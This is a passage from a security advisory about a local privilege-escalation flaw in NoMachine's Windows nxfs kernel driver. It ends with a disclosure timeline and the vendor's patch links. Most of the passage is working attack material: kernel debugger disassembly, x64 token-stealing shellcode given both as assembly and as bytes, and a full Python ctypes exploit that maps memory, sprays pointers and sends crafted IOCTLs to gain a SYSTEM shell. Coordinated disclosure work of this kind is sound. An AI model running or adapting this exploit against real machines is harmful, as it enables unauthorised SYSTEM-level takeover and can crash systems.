fffff800`02bc240e mov r15,rcx
fffff800`02bc2411 cmp qword ptr [rbx+0A8h],0 ;check the object type+0xa8 is not null
fffff800`02bc2419 jne nt!ObpCloseHandleTableEntry+0xe4 (fffff800`02bc24a4)
fffff800`02bc241f mov ebx,dword ptr [rdi]
&lt;…Snip…&gt;
fffff800`02bc24a4 mov rax,qword ptr gs:[188h]
fffff800`02bc24ad cmp qword ptr [rax+70h],r8 ;grab the current processes _EPROCESS
fffff800`02bc24b1 jne nt! ?? ::NNGAKEGL::`string’+0x35700 (fffff800`02b3520e)
fffff800`02bc24b7 movzx r9d,byte ptr [rsp+0B0h]
fffff800`02bc24c0 lea rdx,[r12+30h]
fffff800`02bc24c5 mov r8,r10
fffff800`02bc24c8 mov rcx,r13
fffff800`02bc24cb call qword ptr [rbx+0A8h] ;call our pointer

Notice how the second entry in the table (at offset 1) is 0xbad0b0b0, mapping this address and then storing some value at 0xbad0b0b0+0xA8 should give us an exception with rip equal to our value.

At this point we know that we can reliably control rip in ring 0, if we store a legitimate pointer in 0xbad0b0b0+0xA8 that points to some shellcode, we should be able to steal a SYSTEM token. The shellcode is very similar to our x86 token stealing code – the owning process of our code is python.exe, whose parent is cmd.exe, so we still place the token in the parents token.

The shellcode is as follows (offsets are for a Win7 SP1 x64):

;win764 kernel shellcode
;Steal a system token and store it
;in the current processes parents token 
section .text
mov rax, [gs:0x188];
mov rax, [rax + 0x70] 		;get a pointer to current EPROCESS
mov rbx, [rax + 0x290]		;get parents pid

Loop1:
	mov rax, [rax + 0x188]  ;go to next process
	sub rax, 0x188			
	cmp [rax + 0x180], rbx	;cmp PID to parent pid 
	jne Loop1
	
mov rcx, rax 				;keep pointer to parent process
mov rdx, 0x4				;SYSTEM pid

Loop2:
	mov rax, [rax + 0x188];
	sub rax, 0x188;
	cmp [rax + 0x180], rdx   ;is this a system process?
	jne Loop2;
	
mov rax, [rax + 0x208]		 ;grab the system token
mov [rcx + 0x208], rax;		 ;replace parent processes token. 

xor rax,rax ;nt_success

ret;

We map our shellcode and write it in memory, and gain a successful SYSTEM shell.

As we have mentioned, this is not 100% reliable, if rsi is at the wrong offset, then we end up causing a denial of service. The code, which was a nice introduction to kernel exploitation with python, is as follows:

from ctypes import *
from ctypes.wintypes import *
import struct
import sys
import os

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
STATUS_INVALID_HANDLE = 0xC0000008

shellcode_len = 90
s = ""
s += "\x65\x48\x8B\x04\x25\x88\x01\x00"		#mov rax, [gs:0x188]
s += "\x00"
s += "\x48\x8B\x40\x70"						#mov rax, [rax + 0x70]
s += "\x48\x8B\x98\x90\x02\x00\x00"			#mov rbx, [rax + 0x290]	
s += "\x48\x8B\x80\x88\x01\x00\x00"			#mov rax, [rax + 0x188]
s += "\x48\x2D\x88\x01\x00\x00"				#sub rax, 0x188
s += "\x48\x39\x98\x80\x01\x00\x00"			#cmp [rax + 0x180], rbx
s += "\x75\xEA"								#jne Loop1
s += "\x48\x89\xC1"							#mov rcx, rax
s += "\xBA\x04\x00\x00\x00"					#mov rdx, 0x4
s += "\x48\x8B\x80\x88\x01\x00\x00"			#mov rax, [rax + 0x188]
s += "\x48\x2D\x88\x01\x00\x00"				#sub rax, 0x188
s += "\x48\x39\x90\x80\x01\x00\x00"			#cmp [rax + 0x180], rdx
s += "\x75\xEA"								#jne Loop2
s += "\x48\x8B\x80\x08\x02\x00\x00"			#mov rax, [rax + 0x208]	
s += "\x48\x89\x81\x08\x02\x00\x00"			#mov [rcx + 0x208], rax
s += "\x48\x31\xC0"							#xor rax,rax
s += "\xc3"									#ret
shellcode = s


'''
* Convert a python string to PCHAR
@Param string - the string to be converted.
@Return - a PCHAR that can be used by winapi functions.
'''
def str_to_pchar(string):
	pString = c_char_p(string)

	return pString

'''
* Map memory in userspace using NtAllocateVirtualMemory
@Param address - The address to be mapped, such as 0x41414141.
@Param size - the size of the mapping.
@Return - a tuple containing the base address of the mapping and the size returned.
'''
def map_memory(address, size):
	temp_address = c_void_p(address)
	size = c_uint(size)

	proc = windll.kernel32.GetCurrentProcess()
	nt_status = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc),
                                            byref(temp_address), 0,
                                            byref(size),
                                            MEM_RESERVE|MEM_COMMIT,
                                            PAGE_EXECUTE_READWRITE)

	#The mapping failed, let the calling code know
	if nt_status != 0:
		return (-1, c_ulong(nt_status).value)
	else:
		return (temp_address, size)

'''
* Write to some mapped memory.
@Param address - The address in memory to write to.
@Param size - The size of the write.
@Param buffer - A python buffer that holds the contents to write.
@Return - the number of bytes written.
'''
def write_memory(address, size, buffer):
	temp_address = c_void_p(address)
	temp_buffer = str_to_pchar(buffer)
	proc = c_void_p(windll.kernel32.GetCurrentProcess())
	bytes_ret = c_ulong()
	size = c_uint(size)

	windll.kernel32.WriteProcessMemory(proc,
									temp_address,
									temp_buffer,
									size,
									byref(bytes_ret))

	return bytes_ret

'''
* Get a handle to a device by its name. The calling code is responsible for 
* checking the handle is valid.
@Param device_name - a string representing the name, ie \\\\.\\nxfs-net....
'''
def get_handle(device_name):
	return windll.kernel32.CreateFileA(device_name,
                                GENERIC_READ | GENERIC_WRITE,
                                0,
                                None,
                                OPEN_EXISTING,
                                0,
                                None)

def main():
	print "[+] Attempting to exploit uninitialised stack variable, this has a chance of causing a bsod!"

	print "[+] Mapping the regions of memory we require"

	#Try and map the first 3 critical regions, if any of them fail we exit.
	address_1, size_1 = map_memory(0x14c00000, 0x1f0000)
	if address_1 == -1:
		print "[x] Mapping 0x610000 failed with error %x" %size_1
		sys.exit(-1)

	address_2, size_2 = map_memory(0x41414141, 0x100000)
	if address_2 == -1:
		print "[x] Mapping 0x41414141 failed with error %x" %size_2
		sys.exit(-1)

	address_3, size_3 = map_memory(0xbad0b0b0, 0x1000)
	if address_3 == -1:
	    print "[x] Mapping 0xbad0b0b0 failed with error %x" %size_3
	    sys.exit(-1)

	#this will hold our shellcode
	sc_address, sc_size = map_memory(0x42424240, 0x1000)
	if sc_address == -1:
	    print "[x] Mapping 0xbad0b0b0 failed with error %x" %sc_size
	    sys.exit(-1)

	#Now we write certain values to those mapped memory regions
	print "[+] Writing data to mapped memory..."
	#the first write involves storing a pointer to our shellcode 
	#at offset 0xbad0b0b0+0xa8
	buff = "\x40BBB" #0x42424240
	bytes_written = write_memory(0xbad0b0b0+0xa8, 4, buff)
	
	write_memory(0x42424240, shellcode_len, shellcode)

	#the second write involves spraying the first memory address with pointers
	#to our second mapped memory.
	print "\t spraying unitialised pointer memory with userland pointers"
	
	buff = "\x40AAA" #0x0000000041414140
	for offset in range(4, size_1.value, 8):
		temp_address = address_1.value + offset
		write_memory(temp_address, 4, buff)

	#the third write simply involves setting 0x41414140-0x18 to 0x5
	#this ensures the kernel creates a handle to a TOKEN object.
	print "[+] Setting TOKEN type index in our userland pointer"
	buff = "\x05"
	temp_address = 0x41414140-0x18
	write_memory(temp_address, 1, buff)

	print "[+] Writing memory finished, getting handle to first device"
	handle = get_handle("\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061")

	if handle == STATUS_INVALID_HANDLE:
		print "[x] Couldn't get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
		sys.exit(-1)

	#if we have a valid handle, we now need to send ioctl 0x222014
	#this creates a new device for which ioctl 0x222030 can be sent
	in_buff = struct.pack("<I", 0x190) +  struct.pack("<I", 0x1) + "AA"
	in_buff = str_to_pchar(in_buff)
	out_buff = str_to_pchar("A"*0x90)
	bytes_ret = c_ulong()

	ret = windll.kernel32.DeviceIoControl(handle,
                                      0x222014,
                                      in_buff,
                                      0x10,
                                      out_buff,
                                      0x90,
                                      byref(bytes_ret),
                                      0)
	if ret == 0:
		print "[x] IOCTL 0x222014 failed"
		sys.exit(-1)

	print "[+] IOCTL 0x222014 returned success"

	#get a handle to the next device for which we can send the vulnerable ioctl.
	print "[+] Getting handle to \\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
	handle = get_handle("\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}")

	if handle == STATUS_INVALID_HANDLE:
		print "[x] Couldn't get handle"
		sys.exit(-1)

	#this stage involves attempting to manipulate the Object argument on the stack.
	#we found that making repeated calles to CreateFileA increased this value.
	print "[+] Got handle to second device, now generating a load more handles"
	for i in range(0, 900000):
		temp_handle = get_handle("\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}")

	#coming towards the end, we send ioctl 0x222030, this has the potential to bluescreen the system.
	#we don't care about the return code.
	print "[+] Sending IOCTL 0x222030"
	in_buff = str_to_pchar("A"*0x30)
	out_buff = str_to_pchar("B"*0x30)

	windll.kernel32.DeviceIoControl(handle,
                                    0x222030,
                                    in_buff,
                                    0x30,
                                    out_buff,
                                    0x30,
                                    byref(bytes_ret),
                                    0)

	#finally, we confuse the kernel by setting our object type index to 1.
	#this then points to 0xbad0b0b0, and namely 0xbad0b0b0+0xa8 for the close procedure(???)
	print "[+] Setting our object type index to 1"
	temp_address = 0x41414140-0x18
	write_memory(temp_address, 1, "\x01")

	#The process should now exit, where the kernel will attempt to clean up our dodgy handle
	#This will cause .....

if __name__ == '__main__':
	main()

 

Credit

Tim Carrington – @__invictus_ – as part of Fidus’ UK penetration testing team.

 

Timeline

Initial request for contact – 8/2/18
Response from vendor, advisory sent – 8/2/18
Vendor responds with their technical analysis and a proposed fix, to which we agreed – 13/2/18
Cve assigned – 13/2/18
Patch released, vendor informs social media as well as posts reports on its official website – 20/2/18

 

NoMachine’s Comment

NoMachine provided the following announcements in relation to our security advisory:

https://www.nomachine.com/SU02P00195

https://www.nomachine.com/SU02P00194

https://www.nomachine.com/TR02P08408

And the patch guidelines are:

“Users can upgrade their Windows installations via automatic software updates or by downloading and installing the new
packages from our web site: https://www.nomachine.com/download or their Customer Area if they are customers with a valid license.”